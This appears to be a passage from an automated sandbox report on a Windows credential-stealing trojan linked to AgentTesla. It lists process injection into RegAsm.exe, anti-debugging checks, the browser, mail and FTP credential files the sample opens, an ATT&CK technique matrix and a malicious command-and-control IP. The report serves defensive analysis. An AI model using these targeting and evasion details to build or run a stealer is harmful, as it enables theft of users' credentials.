                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: RegAsm.exe, 00000008.00000002.2539938968.0000000006290000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0054A84C mov eax, dword ptr fs:[00000030h]4_2_0054A84C
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0054A860 mov eax, dword ptr fs:[00000030h]4_2_0054A860
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0054AB35 mov eax, dword ptr fs:[00000030h]4_2_0054AB35
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0054A7DA mov eax, dword ptr fs:[00000030h]4_2_0054A7DA
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272B06 mov eax, dword ptr fs:[00000030h]4_2_02272B06
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02276A17 mov eax, dword ptr fs:[00000030h]4_2_02276A17
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02276F4D mov eax, dword ptr fs:[00000030h]4_2_02276F4D
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02276C57 mov eax, dword ptr fs:[00000030h]4_2_02276C57
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_022730D7 mov eax, dword ptr fs:[00000030h]4_2_022730D7
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_022768DC mov eax, dword ptr fs:[00000030h]4_2_022768DC
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0227690D mov eax, dword ptr fs:[00000030h]4_2_0227690D
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02276965 mov eax, dword ptr fs:[00000030h]4_2_02276965
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443846 mov eax, dword ptr fs:[00000030h]8_2_00443846
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004438F8 mov eax, dword ptr fs:[00000030h]8_2_004438F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044388F mov eax, dword ptr fs:[00000030h]8_2_0044388F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044448A mov ecx, dword ptr fs:[00000030h]8_2_0044448A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004438AB mov ecx, dword ptr fs:[00000030h]8_2_004438AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443D84 mov eax, dword ptr fs:[00000030h]8_2_00443D84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443E2E mov eax, dword ptr fs:[00000030h]8_2_00443E2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443AE6 mov ecx, dword ptr fs:[00000030h]8_2_00443AE6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443B38 mov eax, dword ptr fs:[00000030h]8_2_00443B38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004437EE mov eax, dword ptr fs:[00000030h]8_2_004437EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004437BD mov eax, dword ptr fs:[00000030h]8_2_004437BD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 558008Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D3D008Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D6yz87XjgM.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D6yz87XjgM.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D6yz87XjgM.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7908, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules
                      Boot or Logon Initialization Scripts311
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      111
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeylogging23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                      Process Injection
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      D6yz87XjgM.exe37%ReversingLabsWin32.Trojan.Midie
                      D6yz87XjgM.exe100%AviraTR/AD.GenSteal.zobjr
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      172.67.74.152
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0D6yz87XjgM.exefalse
                            high
                            https://api.ipify.orgD6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://sectigo.com/CPS0D6yz87XjgM.exefalse
                                high
                                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#D6yz87XjgM.exefalse
                                  high
                                  https://account.dyn.com/D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://ocsp.sectigo.com0D6yz87XjgM.exefalse
                                      high
                                      https://api.ipify.org/tRegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zD6yz87XjgM.exefalse
                                            high
                                            http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#D6yz87XjgM.exefalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.254.34.31
                                              unknownUnited States
                                              64200VIVIDHOSTINGUStrue
                                              172.67.74.152
                                              api.ipify.orgUnited States
                                              13335CLOUDFLARENETUSfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1549405
                                              Start date and time:2024-11-05 16:03:59 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 49s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:D6yz87XjgM.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.spyw.evad.winEXE@5/1@1/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 83
                                              • Number of non-executed functions: 52
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: D6yz87XjgM.exe
                                              TimeTypeDescription
                                              10:05:05API Interceptor117x Sleep call for process: RegAsm.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              162.254.34.31Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                  Request for Best Price Offer.exeGet hashmaliciousAgentTeslaBrowse
                                                    EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                      Order0958490.vbeGet hashmaliciousAgentTeslaBrowse
                                                        Ref#0503711.exeGet hashmaliciousAgentTeslaBrowse
                                                          Booking_0106.exeGet hashmaliciousAgentTeslaBrowse
                                                            Ref_5010_103.exeGet hashmaliciousAgentTeslaBrowse
                                                              Ship_Doc_18505.exeGet hashmaliciousAgentTeslaBrowse
                                                                Booking-103.exeGet hashmaliciousAgentTeslaBrowse
                                                                  172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                  • api.ipify.org/
                                                                  Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                  • api.ipify.org/
                                                                  y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                  • api.ipify.org/
                                                                  file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                  • api.ipify.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  api.ipify.orgNt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 104.26.13.205
                                                                  https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                  • 172.67.74.152
                                                                  Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                  • 104.26.12.205
                                                                  COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 104.26.12.205
                                                                  REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.13.205
                                                                  https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                  • 104.26.12.205
                                                                  Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  DB_DHL_AWB_001833022AD.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.74.152
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  VIVIDHOSTINGUSm68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 64.190.116.37
                                                                  Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 68.64.140.119
                                                                  spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 216.157.141.60
                                                                  arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 206.40.174.18
                                                                  Request for Best Price Offer.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  EQORY0083009.vbsGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  Order0958490.vbeGet hashmaliciousAgentTeslaBrowse
                                                                  • 162.254.34.31
                                                                  d4OrW9atV2.exeGet hashmaliciousFormBookBrowse
                                                                  • 162.254.32.121
                                                                  CLOUDFLARENETUShttp://www.axa-assistance.co.ukGet hashmaliciousUnknownBrowse
                                                                  • 104.18.86.42
                                                                  Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 172.67.74.152
                                                                  L#U043e#U0430der.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.187.9
